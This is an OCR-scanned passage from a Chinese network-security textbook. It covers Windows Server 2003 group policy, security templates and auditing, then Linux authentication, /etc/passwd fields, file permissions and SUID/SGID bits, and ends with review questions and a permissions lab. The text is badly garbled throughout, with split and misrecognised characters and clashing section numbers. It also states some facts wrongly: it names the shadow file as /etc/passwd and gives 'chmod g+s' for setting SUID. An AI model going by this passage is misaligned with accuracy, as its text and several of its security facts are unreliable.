公 钥 策略 用 来 设置 “加 密 恢 复 代理 人 ”。NTFS 5. 0 具有 EFS 加 密 功 能 , EFS 加 密 是 利 
用 非 对 称 加 密 体系 ( 即 公 钥 私 钥 对 ) 对 文件 进行 加 密 , 而 私 钥 的 持 有 人 为 使 用 EFS 加 密 文件 
的 用 户 ,NTFS 依靠 该 用 户 的 SID 来 判断 其 私 钥 。 如 果 用 户 账户 被 删除 , 则 即使 是 新 建 一 个 
一 模 一 样 的 用 户 账户 ,由 于 其 SID 不 同 , 也 无 法 恢复 经 过 加 密 的 数据 。 利 用 公 钥 策略 可 以 
设置 经 过 加 密 的 数据 恢复 代理 ,通过 该 代理 恢复 数据 ,如 图 5-21 所 示 。 
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4) IP 安全 策略 

“IP 安全 策略 ”中 可 以 设置 IPSec, 利 用 IPSec 可 以 为 两 台 使 用 TP 协议 传输 数据 的 计算 
机 建立 一 个 加 密 的 安全 通信 通道 ,从 而 保证 了 数据 在 网 络 上 传输 的 安全 性 。IPSec 加 密 传 
输 的 数据 ,其 配置 和 管理 可 以 在 IP 安全 策略 中 进行 ,如 图 5-22 所 示 。 
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对 所 有 I 通讯 总 是 使 
正常 通讯 (不 安全 的 )。. 
对 所 有 IP 通讯 总 是 使 


图 5-22 ”IP 安全 策略 设置 


2. 配置 并 实施 组 策略 


1) 组 策略 
在 Windows Server 2003 的 活动 目录 中 ,没有 “系统 策略 编辑 器 ”, 而 是 使 用 “组 策略 ”。 
该 工具 的 主要 作用 是 规定 用 户 和 计算 机 的 使 用 环境 。 组 策略 不 仅 应 用 于 用 户 和 客户 端 计算 
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机 ,还 应 用 于 成 员 服务 器 \ 域 控制 器 以 及 管理 范围 内 的 其 他 计算 机 。 

组 策略 设置 定义 了 系统 管理 员 需 要 管理 的 用 户 桌 面 环境 的 各 种 组 件 。 要 为 特定 用 户 组 
创建 特殊 的 桌面 配置 ,可 使 用 组 策略 对 象 编辑 器 创建 组 策略 对 象 ,组 策略 对 象 与 选 定 的 活动 
目录 对 象 相 关联 。 

组 策略 包括 以 下 两 个 部 分 : 用 户 配置 策略 ,是 指定 对 应 于 某 个 用 户 账户 的 策略 ,这 样 不 
论 该 账户 在 域内 哪个 计算 机 上 登录 ,其 工作 环境 都 是 一 样 的 ; 计算 机 配置 策略 ,是 指定 对 应 
于 某 台 计算 机 的 策略 ,这样 不 论 哪个 账户 在 该 计算 机 上 登录 ,其 工作 环境 都 是 一 样 的 。 

2) 组 策略 的 使 用 条 件 

为 了 通过 一 次 设 定 就 可 以 在 多 台 计算 机 上 应 用 ,就 需要 实施 组 策略 。 组 策略 的 各 种 设 
定 都 保存 在 组 策略 对 象 中 (group policy object,GPO) 。 

在 实施 组 策略 前 应 该 满足 以 下 条 件 : 组 策略 只 能 应 用 在 基于 Windows Server 2003 的 
域 控制 器 的 网 络 中 的 计算 机 和 用 户 ; 组 策略 中 的 各 种 设 定 值 均 保存 在 活动 目录 的 数据 库 
中 ,因此 只 有 在 域 控 制 器 上 可 以 保存 设置 值 ; 组 策略 只 能 应 用 在 基于 Windows Server 2003 
的 计算 机 ,基于 Windows 9x 和 Windows NT 的 计算 机 不 能 应 用 Windows Server 2003 组 
策略 。 

本 地 安全 设置 拥有 的 功能 比 组 策略 要 少 得 多 ,并 且 应 用 范围 有 限 ,因此 基于 Windows 
Server 2003 的 网 络 中 以 应 用 组 策略 为 主 。 

3) 组 策略 的 使 用 规则 

当 多 个 策略 同时 存在 的 时 候 ,将 按 如 下 策略 应 用 : 首先 是 本 地 策略 ; 其 次 是 站 点 和 域 
级 的 策略 ; 最 后 是 应 用 组 织 单元 的 设 定 值 。 策 略 的 有 效 值 是 多 个 策略 的 并 集 ,但 当 对 于 一 
个 项 目 有 不 同 的 设置 值 时 ,后 面 的 将 代替 前 面 的 设置 值 。 

在 默认 情况 下 活动 目录 结构 中 的 下 层 容器 会 继承 上 层 容器 的 策略 。 最 上 层 容 器 为 站 
点 ,其 下 为 域 和 组 织 单位 。 如 果 有 特殊 需要 ,可 以 阻止 下 层 的 容器 继承 上 层 容 器 的 策略 ,而 
独立 地 应 用 自己 的 各 项 策略 ,这 项 设置 被 称 为 "组织 策略 继承 "。 如 果 和 希望 对 于 某 个 GPO 
的 设 定 从 某 一 级 开始 向 下 都 必须 应 用 该 级 的 设 定 值 , 则 需要 使 用 被 称 为 “禁止 替代 ”的 设置 。 

Windows Server 2003 刚 建立 好 , 域 中 默认 有 一 个 GPO, 称 为 默认 域 策 略 。 每 个 GPO 
都 具有 计算 机 配置 和 用 户 配 置 两 个 部 分 ,分 别 应 用 到 GPO 作用 范围 内 的 计算 机 和 用 户 上 。 
计算 机 启动 后 ,系统 会 自动 到 域 的 活动 目录 中 寻找 适用 于 本 机 的 GPO 的 计算 机 配置 部 分 。 
当 用 户 在 域 中 登录 之 后 ,系统 也 会 到 活动 目录 中 寻找 适用 于 该 用 户 GPO 的 用 户 策略 部 分 。 


3. 使 用 预定 义 安全 性 模板 


Windows Server 2003 中 包含 了 多 个 安全 性 模板 分 别 适 用 于 不 同安 全 需求 ,利用 这 些 
模板 网 络 管理 人 员 就 可 以 简化 策略 的 设 定 和 实施 操作 。 预 定义 的 安全 性 模板 通常 包含 
了 大 多 数 的 安全 设 定 ,但 同时 管理 人 员 也 可 以 按照 需要 继续 配置 以 适应 一 个 具体 网 络 的 

预定 义 的 安全 模板 包括 以 下 4 种 安全 级 别 的 模板 。 

(D) 基本 (basic) 。 该 级 别 的 模板 为 Windows 2000 定义 的 默认 的 安全 级 别 ,可 以 用 做 
基础 配置 。 其 中 包括 以 下 几 种 设 定 : 默认 的 工作 站 、 默 认 的 服务 器 .默认 的 域 控制 器 ,可 以 
TENsystemrootVsecurity V templates 文件 夹 中 找到 这 几 个 模板 。 
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(2) 兼容 (compatible) 。 提 供 比 基本 模板 更 高 的 安全 级 别 , 但 仍然 兼容 标准 的 商用 应 用 
程序 的 所 有 功能 ,使 之 仍然 可 以 有 效 地 运行 。 该 模板 为 兼容 工作 站 或 服务 器 模板 。 

(3) 安全 (secure) 。 提 供 多 种 安全 性 ,安全 性 被 视 为 重要 的 考虑 因素 。 这 种 模板 有 可 能 
会 影响 到 一 些 商用 应 用 程序 的 某 些 功能 的 运行 。 其 中 包括 安全 的 工作 站 或 服务 器 、 安 全 的 
域 控制 器 。 

(4) 高 度 安 全 (high)。 提 供 预定 义 下 的 最 高 安全 性 ,安全 性 被 视 为 首要 考虑 的 因素 。 
因此 将 不 会 考虑 应 用 程序 是 否 会 受到 这 些 设 定 的 影响 ,在 通常 情况 下 这 类 模板 要 慎重 使 
包括 高 安全 的 工作 站 或 服务 器 、 高 安全 的 域 控制 器 。 

* 应 用 案例 

事件 监视 器 中 的 安全 日 志 在 默 认 情况 下 不 是 记录 任何 事件 的 ,但 是 为 了 了 解 网 络 中 资 
源 的 使 用 情况 ,必须 记录 相关 的 资源 使 用 行为 。 提 高 网 络 的 安全 性 就 必须 设置 系统 资源 审 
核 ,以 使 得 事件 监视 器 可 以 将 网 络 管理 员 所 关心 的 资源 的 使 用 情况 记录 到 安全 日 志 中 。 安 
全 日 志 中 将 包含 被 审核 事件 的 如 下 信息 : 对 该 资源 执行 的 操作 ,执行 该 操作 的 用 户 ,事件 是 
成 功 的 还 是 失败 的 ,发 生 的 事件 以 及 一 些 附加 信息 。 通 过 这 些 信息 ,管理 员 可 以 分 析 网 络 的 
安全 性 ,并 制定 相应 的 策略 。 

审核 分 为 两 种 类 型 ,第 一 种 审核 是 与 操作 系统 本 身 安全 性 相关 的 各 种 事件 的 审核 ,这 一 
类 的 审核 必须 在 组 策略 的 策略 中 设置 ; 第 二 种 就 是 对 于 网 络 资源 的 审核 ,这 一 类 审核 将 使 
管理 员 了 解 资源 的 使 用 情况 。 

(1) 选择 审核 对 象 。 审 核 将 监视 发 生 在 被 审核 对 象 上 的 事件 ,将 只 记录 所 发 生 的 事件 
是 成 功 的 还 是 失败 的 , 即 只 能 审核 对 某 项 操作 的 成 功 事件 或 失败 事件 。 具 体 是 审核 成 功 还 
是 失败 主要 看 管理 员 更 关心 哪 类 事件 的 发 生 。 这 些 对象 监 视 用 户 对 系统 的 安全 所 做 的 各 种 
行为 ,该 审核 对 于 所 有 的 用 户 而 言 都 有 效 。 审 核 事件 的 含义 的 表 5-2 所 示 。 


表 5-2 审核 事件 的 含义 


审核 对 象 说 明 
审核 目录 访问 审核 对 活动 目录 的 各 种 访问 
审核 对 象 访问 审核 对 文件 或 文件 夹 等 对 象 的 操作 
审核 系统 事件 审核 与 系统 相关 的 事件 ,如 启动 和 关闭 计算 机 等 
审核 策略 改变 审核 对 策略 的 改变 操作 
审核 特权 使 用 审核 用 户 使 用 用 户 权力 的 操作 ,如 更 改 系统 时 间 等 
审核 账户 登录 事件 审核 账户 的 登录 与 注销 操作 
审核 账户 管理 审核 与 账户 管理 有 关 的 操作 
审核 登录 事件 审核 通过 网 络 建立 访问 资源 的 操作 
审核 过 程 追 踪 审核 应 用 程序 的 启动 和 关闭 


(2) 设置 资源 审核 。 设 置 资源 审核 是 了 解 资源 使 用 情况 的 一 个 最 好 的 办 法 。 与 审核 系 
统 事件 一 样 ,对 资源 审核 也 是 基于 审核 事件 的 成 功 或 失败 操作 。 另 外 ,为 了 让 事件 监视 器 的 
安全 日 志 记录 资源 的 使 用 行为 ,就 必须 在 审核 策略 中 打开 对 ”审核 对 象 访问 ”的 审核 ,安全 日 
志 才 记录 资源 审核 的 结果 (只 能 在 NTFS 分 区 上 设置 资源 审核 ,FAT 文件 系统 不 支持 审 
核 ) 。 设 置 资 源 审核 的 操作 如 下 。 
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(QD 打开 Windows 资源 管理 器 。 

@ 找到 并 选中 希望 设置 审核 的 对 象 (本 例 为 c:\ 课 程 建 设 文件 夹 )。 
O 右 击 要 审核 的 文件 或 文件 夹 ,选择 “属性 ”命令 ,选择 “安全 ”选项 卡 。 
@ 在 “安全 ”选项 卡 中 单 击 “ 高 级 ”按钮 ,如 图 5-23 所 示 。 


图 5-23 “安全 "选项 卡 


© 在 出 现 的 “访问 控制 设置 "对 话 框 中 选择 “审核 ”选项 卡 。 

© 在 “审核 ”选项 卡 中 , 单 击 “ 添 加 ”按钮 。 

O 在 出 现 的 “选择 用 户 或 组 ”对 话 框 中 ,选择 要 审核 的 用 户 , 单 击 “ 确 定 ” 按 钮 ,如 图 5-24 
所 示 。 
在 “课程 建设 的 权限 项 目 ” 对 话 框 中 选择 对 资源 的 不 同 操作 的 成 功 事件 或 失败 事件 
的 审核 ,如 图 5-25 所 示 。 


选择 用 户 或 组 


图 5-24 “选择 用 户 或 组 ”对 话 框 (2) 图 5-25 选择 审核 项 目 
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6.8 Linux 操作 系统 安全 


Linux 是 一 款 开放 源 代码 、 免 费 使 用 的 操作 系统 ,不 仅 为 用 户 提供 强大 的 操作 系统 功 
能 ,还 具有 可 靠 .安全 ,稳定 的 性 能 。Linux 采取 了 许多 安全 技术 措施 ,达到 了 TCSEC 的 C2 
安全 级 别 。 


5.3.1 Linux 自身 的 安全 机 制 
1. 身份 验证 机 制 


在 Linux 中 ,用 户 的 身份 验证 和 权限 是 分 开设 计 的 。Linux 系统 采用 PAM (pluggable 
authentication modules) 身 份 验证 体系 。PAM 是 一 套 共 享 库 , 其 目的 是 提供 一 个 框架 和 一 
套 编程 接口 ,将 验证 工作 由 程序 员 交 给 管理 员 处 理 。PAM 允许 管理 员 在 多 种 验证 方法 之 
间作 出 选择 ,能 够 改变 本 地 验证 方法 而 不 需要 重新 编译 与 验证 相关 的 应 用 程序 。 


2. 安全 审计 


虽然 Linux 不 能 预测 主机 何 时 受到 攻击 ,但 它 可 以 记录 攻击 者 的 行踪 。 可 以 进行 检测 、 
记录 时 间 信息 和 网 络 连接 情况 ,这 些 信息 将 被 复制 到 日 志 中 备查 。 日 志 是 Linux 安全 结构 
中 的 一 个 重要 内 容 ,Linux 提供 网 络 .主机 和 用 户 级 的 日 志 信息 。 


3. 强制 访问 控制 


强制 访问 控制 是 一 种 由 系统 管理 员 从 全 系统 的 角度 定义 和 实施 的 访问 控制 , 它 通过 标 
记 系 统 中 的 主体 和 客体 强制 性 地 限制 信息 的 共享 和 流动 ,使 不 同 的 用 户 只 能 访问 到 与 其 有 
关 、 指 定 范围 的 信息 ,从 根本 上 防止 信息 的 泄密 和 访问 混乱 的 现象 。 

在 Linux 上 实现 强制 访问 控制 比较 典型 的 有 安全 增强 Linux (security enhanced 
Linux, SE Linux) 和 基于 规则 集 的 访问 控制 (rule set based access control, RSBAC) 。 

SE Linux 安全 性 策略 的 逻辑 和 通用 接口 一 起 封装 在 与 操作 系统 独立 的 组 件 中 ,这 个 单 
独 的 组 件 称 为 安全 服务 器 。 安 全 服务 器 定义 了 一 种 混合 的 安全 性 策略 ,由 类 型 实施 (TE)、 
RBAC 和 多 级 安全 (MLS) 组 成 。 通 过 替换 安全 服务 器 ,可 以 支持 不 同 的 安全 策略 。 

RSBAC 可 以 基于 多 个 模块 提供 灵活 的 访问 控制 。 所 有 与 安全 相关 的 系统 调用 都 扩展 
了 安全 实施 代码 ,这 些 代 码 调用 中 央 决 策 部 件 ,该 部 件 随后 调用 所 有 激活 的 决策 模块 ,形成 
一 个 综合 的 决策 ,然后 由 系统 调用 扩展 来 实施 这 个 决策 。RSBAC 目前 包含 的 模块 主要 有 
MAC,RBAC 和 ACL 等 。 


4. Linux 安全 模块 


Linux 安全 模块 (Linux security module, LSM) Æ Linux 内 核 的 一 个 轻 量 级 通用 访问 控 
WHER. LSM 使 得 各 种 不 同 的 安全 访问 控制 模型 能 够 以 Linux 可 加 载 内 核 模块 的 形式 实 
现 , 用 户 可 以 根据 其 需求 选择 合适 的 安全 模块 加 载 到 Linux 内 核 中 ,从 而 大 大 提高 了 Linux 
安全 访问 控制 的 灵活 性 和 易 用 性 。 目 前 已 经 实现 的 安全 模块 有 SE Linux、 域 和 类 型 增强 
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(DTE Linux) 以 及 Linux 入侵 检测 系统 (LIDS) 等 。 
5. 加 密 文件 系统 


目前 Linux 已 有 多 种 加 密 文件 系统 , 如 密码 文件 系统 (cryptographic file system， 
CFS) ,透明 密码 文件 系统 (transparent cryptographic file system,TCFS) 和 CRYPTFS 等 ， 
较 有 代表 性 的 是 TCFS。TCFS 通过 将 加 密 服务 和 文件 系统 紧密 集成 ,对 于 合法 用 户 访问 
保密 文件 与 访问 普通 文件 几乎 没有 区 别 。TCFS 不 修改 文件 系统 的 数据 结构 ,备份 和 修复 
以 及 用 户 访 问 保 密 文 件 的 语义 也 不 变 。 


5.3.2 Linux 用 户 账户 与 密码 安全 


Linux 操作 系统 是 一 个 多 用 户 ,多 任务 、 分 时 操作 系统 ,任何 一 个 想 使 用 Linux 的 用 户 ， 
必须 先 向 该 系统 的 管理 员 申请 一 个 账户 ,然后 才能 使 用 该 系统 。 同 时 为 了 防止 非法 用 户 盗 
用 别人 的 账户 使 用 系统 ,对 每 一 个 账户 还 必须 有 一 个 合法 用 户 才 知道 的 密码 。 因 此 ,用 户 账 
户 和 密码 是 系统 安全 的 第 一 道 防线 ,借助 于 账户 和 密码 就 可 以 把 非法 用 户 拒 之 门 外 。 


1. Linux 登录 认证 机 制 


Linux 的 用 户 身份 认证 采用 账户 /密码 的 方案 。 用 户 通 过 正确 的 账户 和 密码 后 ,系统 才 
能 确认 用 户 的 合法 身份 。 通 过 终端 登录 Linux 操作 系统 的 过 程 可 描述 如 下 。 

(1) init 进程 确保 为 每 个 终端 连接 (或 虚拟 连接 ) 运 行 一 个 getty 程序 。 

(2) getty 监听 对 应 的 终端 并 等 待 用 户 登 录 。 

(3) getty 输出 一 条 欢迎 信息 (保存 在 /etc/issue 中 ) ,并 提示 用 户 输入 用 户 名 ,最 后 运行 
login 程序 。 

(4) login 以 用 户 作为 参数 ,提示 用 户 输入 密码 。 

(5) 如 果 用 户 名 和 密码 匹配 , 则 login 程序 为 用 户 启动 shell; 否则 ,login 程序 退出 , 进 
程 终止 。 
(6) init 进程 注意 到 Linux 进程 已 终止 , 则 会 再 次 为 该 终端 启动 getty 程序 。 

当 用 户 输入 密码 时 ,Linux 使 用 改进 的 DES 算法 (通过 调用 crypt O 函数 实现 ) 对 其 加 
密 , 并 与 结果 域 密码 文件 (存储 在 /etc/ passwd) 中 的 加 密 用 户 密码 比较 , 若 两 者 匹配 , 则 说 明 用 
户 的 登录 合法 ,否则 拒绝 用 户 登 录 。 另 外 ,系统 也 可 以 如 此 设置 ; 如 果 用 户 3 次 登录 都 失败 ， 
则 系统 自动 锁定 ,不 让 用 户 再 继续 登录 。 这 也 是 Linux 防止 人 侵 者 野蛮 冯 入 的 一 种 方法 。 


2. Linux 的 密码 文件 


Linux 密码 文件 /etc/ passwd 是 登录 验证 的 关键 ,在 其 中 保存 系统 中 所 有 用 户 及 其 相关 信 
息 , 所 以 密码 文件 是 Linux 安全 的 关键 文件 之 一 。 这 个 文件 的 使 用 者 是 超级 用 户 (root) ,只 有 
超级 用 户 才 有 写 的 权力 ,而 一 般 用 户 只 有 读 的 权力 。 下 面 是 一 个 /etc/ passwd 文件 的 例子 。 

#cat /etc/passwd 

root: %hy# hgbWE4: 0: 0: : / : /bin/ksh 


userl: Eh6bSre7h: 150: 101: lishuanbao: /home/adm: /bin/sh 
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这 个 文件 是 一 个 典型 的 数据 库 文件 ,每 一 行 都 对 应 一 个 用 户 的 身份 验证 信息 ,每 一 行 分 
为 7 个 字段 ,各 字段 间 用 冒号 (: ) 分 隔 ,从 左 到 右 , 各 字段 的 含义 分 别 如 下 。 

(1) 登录 名 。 也 就 是 账户 名 ,其 长 度 一 般 不 超过 9 个 字符 。 

(2) 加 密 密 码 。 因 为 普通 用 户 对 /etc/passwd 文件 只 有 读 的 权力 ,所 以 密码 这 一 项 是 以 
加 密 的 形式 存放 的 。 

G) 用 户 标识 号 (user ID. UID)。 在 系统 外 部 ,系统 用 一 个 用 户 账户 标识 一 个 用 户 。 但 
在 系统 内 部 处 理 用 户 的 访问 权限 时 ,系统 使 用 的 是 用 户 标识 号 UID。 这 个 用 户 标 识 号 是 一 
个 整数 ,范围 为 0~32 767。 超 级 用 户 root 的 用 户 标识 号 为 0, 普通 用 户 标识 号 一 般 从 10 开 
始 向 上 分 配 。 另 外 在 用 户 的 进程 表 中 有 一 项 是 用 户 标识 号 , 它 表明 哪个 用 户 拥有 这 个 进程 ， 
根据 用 户 的 权限 来 限制 这 个 进程 的 使 用 。 

(4) 组 标识 (group ID,GID)。 组 标识 是 用 户 所 在 组 的 标识 号 。 将 用 户 分 组 是 Linux 操 
作 系 统 对 权限 进行 管理 的 一 种 方式 。Linux 操作 系统 要 给 用 户 某 种 访问 权限 , 则 可 以 对 几 
Usi 分 配 , 然 后 让 一 个 用 户 属 于 某 一 个 组 或 某 几 个 组 。 这 样 可 以 避免 每 次 单独 给 

户 分 配 权限 ,给 管理 带 来 很 大 的 方便 。 与 用 户 标 识 号 一 样 ,组 标识 号 也 是 一 个 0 一 32 767 
MEE. 

(5) 登录 名 。 这 个 字段 用 以 记录 用 户 的 一 些 情况 ,如 用 户 的 全 名 .电话 和 地 址 等 。 在 许 
多 Linux 操作 系统 中 ,此 字段 一 般 没有 任何 描述 性 的 文字 。 

(6) 用 户 的 主 目录 位 置 。 这 个 字段 用 来 指定 用 户 的 HOME 目录 , 当 用 户 登 录 到 系统 账 
户 , 它 就 会 处 在 这 个 目录 下 。 

(7) 用 户 的 命令 行 解释 器 (shell) Linux 操作 系统 中 有 很 多 的 shell 程序 ,如 /bin/sh、 
/bin/chs、/bin/ksh 等 程序 ,每 种 shell 有 各 自 不 同 的 特点 ,此 字段 指定 用 户 登录 后 所 采用 的 
shell。 密 码 文件 中 ,尽管 密码 字段 (第 二 个 字段 ) 是 被 加 密 保存 的 ,但 由 于 /etc/passwd 文件 
对 任何 用 户 都 可 读 , 故 它 常常 成 为 密码 攻击 的 目标 ,所 以 许多 Linux 操作 系统 常用 shadow 
文件 (/etc/passwd) 来 存储 加 密 密 码 ,该 文件 只 有 root 用 户 才能 读 取 ,普通 用 户 不 可 读 。 

在 大 型 分 布 式 系统 中 ,为 了 统一 对 用 户 进行 管理 ,通常 将 每 台 工作 站 上 的 密码 文件 都 存 
放 在 网 络 服务 器 (network information services, NIS) 上 ,通过 NIS 进行 集中 管理 。 


5.3.3 Linux 的 文件 访问 控制 


Linux 操作 系统 的 资源 访问 控制 是 基于 文件 的 。 在 Linux 操作 系统 中 ,各 种 主要 硬件 
设备 .端口 设备 甚至 内 存 都 是 以 文件 形式 存在 的 ,所 有 连接 到 系统 上 的 设备 都 在 /dev 目录 
中 有 一 个 文件 与 之 对 应 ,如 文件 /dev/mem 是 系统 的 内 存 。 虽 然 这 些 设备 文件 和 普通 磁盘 
文件 在 实现 上 不 同 ,但 对 于 系统 来 说 ,它们 都 是 一 个 文件 ,因此 ,在 Linux 操作 系统 中 对 资源 
的 访问 控制 就 是 对 资源 的 访问 控制 。 

1. 文件 (或 目录 ) 访 问 控制 

Linux 的 文件 访问 控制 表现 为 一 组 存 取 控制 规则 , 它 控制 每 个 用 户 可 以 访问 何 种 信息 及 
如 何 访问 。 为 了 维护 系统 的 安全 性 ,系统 中 每 一 个 文件 (或 目录 ) 都 具有 一 定 的 存 取 权限 ,只 有 


具有 这 种 存 取 权限 的 用 户 才能 存 取 该 文件 ,否则 系统 给 出 “Premission Denied” 的 错误 信息 。 
命令 ls 可 列 出 文件 (或 目录 ) 对 系统 内 的 不 同 用 户 所 给 予 的 存 取 权限 。 下 面 是 使 用 


165 


M 


网 络 安全 技术 


ls -1 命令 得 到 的 一 行 输出 结果 。 
—rw-r-r- 1 root root 21504 Apr 24 19:27 passwd 


图 5-26 给 出 了 文件 存 取 权 限 的 图 形 解释 。 


其 他 用 户 的 权限 


——— 网 组 用 户 的 权限 
文件 拥有 者 的 权限 
文件 类 型 


图 5-26 文件 存 取 权限 示意 图 


存 取 权限 位 共有 9 位 ,分 为 3 组 ,用 以 指出 不 同类 型 的 用 户 对 该 文件 的 访问 权限 。 权 限 
有 以 下 3 种 。 

. r: 允许 读 。 

。w: 允许 写 。 

。 x: 允许 执行 。 

用 户 有 以 下 3 种 类 型 。 

。 owner: 该 文件 的 属 主 。 

。 group: 在 该 文件 所 属 用 户 组 中 的 用 户 , 即 同 组 用 户 。 

* other; 除 以 上 两 者 外 的 其 他 用 户 。 

图 5-26 标识 文件 的 属 主 具有 读 、 写 及 执行 权限 , 同 组 用 户 允 许 读 和 执行 操作 ,其 他 用 户 
没有 任何 权限 。 权 限 位 中 ,“-” 标 识 不 允许 相应 的 存 取 权限 。 

上 述 的 授权 模式 同样 适用 于 目录 ,用 1s -1 命令 列 出 时 ,目录 文件 的 类 型 为 4。 用 1s 列 目 
录 要 有 读 许可 ,在 目录 中 增删 文件 要 有 写 许 可 ,进入 目录 或 将 该 目录 作 路 径 分 量 时 要 有 执行 
许可 。 因 此 要 使 用 任何 一 个 文件 时 ,文件 的 许可 才 开 始 起 作用 ,而 rm mv. 只 要 有 目录 的 搜 
索 和 写 许 可 ,不 需要 文件 的 许可 。 


2. 更 改 权限 


通过 chmod 命令 可 以 改变 用 户 对 相应 文件 的 存 取 权限 。chmod 命令 以 新 权限 和 文件 
名 为 参数 ,格式 如 下 : 
chnod [ - rfh] 存 取 权限 文件 名 


chmod 命令 也 有 其 他 方式 的 参数 修改 权限 ,在 此 不 再 多 讲 。 合 理 的 文件 授权 可 防止 偶 
然 地 覆盖 或 删除 文件 (即便 是 属 主 自己 )。 改 变 文 件 属 主 和 组 名 可 用 chown 和 chgrp 命令 。 
其 格式 如 下 : 


chom [ -rfh] 属 主 文件 名 
chgrp [ -rfh] 组 名 文件 名 


文件 的 授予 权限 可 用 3 位 的 八进制 数 表示 ,3 位 的 八进制 数 可 由 图 5-26 所 示 的 3 组 权 
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限 具 体 表示 ,授予 权限 是 许可 位 置 为 1, 不 授予 权限 则 相应 位 置 为 0, 如 上 例 rwxr-x 一 表示 
为 111 101 000,3 为 八进制 数 为 750。 对 于 某 些 特 殊 文 件 (如 一 些 可 执行 文件 ) ,文件 的 授权 
用 一 个 4 位 的 八进制 数 表示 ,后 3 位 同上 ,最 高 的 一 个 八进制 数 分 别 对 应 SUID 位 .SGID 位 
和 sticky 位 。 其 中 前 两 个 与 安全 有 关 , 将 其 作为 特殊 权限 位 在 下 面 描述 。 


3. 特殊 权限 位 


有 时 没有 被 授权 的 用 户 需要 完成 某 些 要 求 授权 的 任务 。 例 如 passwd 程序 ,对 于 普通 
用 户 , 它 允许 改变 自身 的 密码 ,但 不 能 拥有 直接 访问 /etc/passwd 文件 的 权力 ,以 防止 改变 
其 他 用 户 的 密码 。 为 了 解决 这 个 问题 ,Linux 允许 对 可 执行 的 目标 文件 (只 有 可 执行 文件 才 
有 意义 ) 设 置 SUID fll SGID, 

一 个 进程 执行 时 就 被 赋予 4 个 编号 ,以 标识 该 进程 隶属 于 谁 ,分 别 为 实际 和 有 效 的 
UID.、 实 际 和 有 效 的 GID。 实 际 和 有 效 的 UID 和 GID 用 于 系统 确定 进程 对 于 文件 的 存 取 许 
可 。 当 用 户 运行 一 个 可 执行 文件 时 ,进程 继承 了 用 户 的 权限 ,有 效 的 UID 和 GID 一 般 和 实 
际 UID 和 GID 相同 。 而 设置 可 执行 文件 所 有 者 的 有 效 UID, 而 不 是 执行 该 程序 的 用 户 的 
有 效 UID。 因 此 ,由 该 程序 创建 的 进程 都 有 与 该 程序 相同 的 存 取 许可 。 这 样 ,程序 的 所 有 
者 可 通过 程序 的 控制 在 有 限 的 范围 内 向 用 户 发 布 不 允许 被 公众 访问 的 信息 。 同 样 ,SGID 
也 设置 有 效 GID。 命 令 *chmod g + s X fF" fl" chmod g 一 s” 用 来 设置 和 取消 SUID ix 
T. "chmod g + s 文件 名 ”和 "chmod g 一 s" 用 来 设置 和 取消 SGID 设置 。 当 文件 设置 
了 SUID 和 SGID 后 ,chown 和 chgrp 命令 将 全 部 取消 这 些许 可 。 


EE 


. 操作 系统 的 安全 机 制 有 哪些 ? 

. 访问 控制 技术 有 哪些 ? 

. 共享 文件 夹 的 权限 有 哪些 ? 

. 本 地 安全 策略 有 哪些 ? 

. 如何 审 核 Windows Server 2003 的 主机 安全 事件 ? 

. NTFS 权限 使 用 原则 有 哪些 ? 

. Windows Server 2003 组 策略 有 哪些 ? 

. Linux 自身 的 安全 机 制 有 哪些 ? 

. Windows Server 2003 5j Linux 的 文件 访问 控制 有 何 区 别 ? 


Gu 5.1 文件 加 解密 


【 实 训 目的 】 

掌握 Windows Server 2003 的 文件 及 目录 权限 设置 ,能 够 管理 共享 目录 。 
【 实 训 环境 】 

装 有 Windows Server 2003 操作 系统 的 计算 机 。 
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【 实 训 内 容 】 
1. 设置 访问 权限 


CD 以 管理 员 身份 登录 ,建立 一 个 名 为 test 的 用 户 ,密码 为 lishuanbao。 

(D 从 系统 注销 ,以 test 身份 登录 ,选择 "开始 "一 “程序 ”一 附 件 ” 一 "资源 管理 器 ”命令 ， 
创建 一 个 名 为 c:Ntest 的 目录 ,并 创建 一 个 文本 文件 ,本 例 中 为 “example. txt”. 

Q 在 左 侧 窗 格 中 选中 要 设置 权限 的 c:\test 目录 , 右 击 ,选择 “属性 ”命令 ,在 出 现 的 对 
话 框 中 ,选择 “安全 ”选项 卡 , 将 看 到 Everyone 组 具有 对 这 个 文件 的 完全 控制 权限 (Windows 
Server 2003 默认 为 任何 新 建 的 文件 或 目录 分 配 修 改 权 ,分 配给 Everyone 2D . 

@ 单 击 “ 高 级 ”按钮 ,弹出 “用 户 权限 设置 "对话 框 。 在 该 对 话 框 中 ,可 以 添加 和 删除 一 
个 或 多 个 用 户 及 用 户 组 对 所 选 目录 的 权限 , 设 定 权 限 为 读 取 、 写 入、 完全 控制 ,拒绝 访问 等 查 
看 该 文件 的 所 有 权限 (Everyone 组 具有 完全 的 访问 权 )。 

(2) 以 管理 员 身 份 登录 ,打开 c:\test\example. txt 文件 的 Everyone 组 的 “权限 设置 "对 
话 框 ,修改 文件 权限 为 禁止 写 /禁止 修改 。 

(D 单 击 “确定 ?按钮 ,会 看 到 一 个 消息 ,通知 deny 条 目 优 先 覆 盖 allow 条 目 , 单 击 “ 确 定 ” 
按钮 ,返回 资源 管理 器 。 

@ 从 系统 注销 ,以 test 身份 登录 ,使 用 记事 本 打开 c:\test\example. txt 文件 。 

© 添加 一 行文 本 “system allow you to assign file permissions”, EFE“ NF” “AR” 
命令 ,打开 “保存 "对话 框 ,会 看 到 错误 提示 。 

@ 从 记事 本 退出 ,从 系统 注销 ,再 以 Administrator 身份 登录 。 

(3) 打开 c:\test\example. txt 文 件 的 Everyone 组 的 权限 设置 对 话 框 ,修改 文 夹 件 的 权 
限 ,这 样 Administrator 可 以 改变 这 些 权限 (由 于 Administrator 账户 是 Everyone 组 的 一 部 
分 , 它 不 再 具有 对 该 文件 的 写 权 限 ), 单 击 “ 高 级 "按钮 。 

(D 选择 “所 有 者 ”选项 卡 , 并 选中 “Administrator 账户 ”, 单 击 “ 应 用 ”按钮 ,取得 文件 所 
有 权 , 返 回 资源 管理 器 。 

@ 再 次 打开 该 文件 的 属性 对 话 框 ,选择 “安全 ”选项 卡 , 这 次 不 会 看 到 警告 消息 ,因为 已 
拥有 该 文件 ,可 任意 修改 , 单 击 “ 增 加 ”按钮 。 

@ 出 现 “ 选 择 用 户 或 组 ”对 话 框 ,选中 “用 户 账户 ”选项 并 单 击 “ 增 加 ”按钮 ,添加 test 用 
户 。 确 认 test 用 户 被 选中 ,然后 选中 “禁止 " 复 选 框 ,修改 它 的 访问 权 。 

@ 单 击 “ 应 用 ”按钮 ,然后 单 击 “确定 ”按钮 。 

